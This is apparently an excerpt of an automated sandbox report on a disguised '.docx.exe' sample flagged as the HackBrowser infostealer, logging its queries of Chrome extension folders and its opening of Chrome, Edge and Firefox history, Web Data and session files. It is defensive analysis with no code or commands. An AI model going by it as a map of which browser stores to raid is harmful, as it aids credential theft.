Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected HackBrowser

Source: Yara match	File source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.2083812372.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe PID: 5952, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
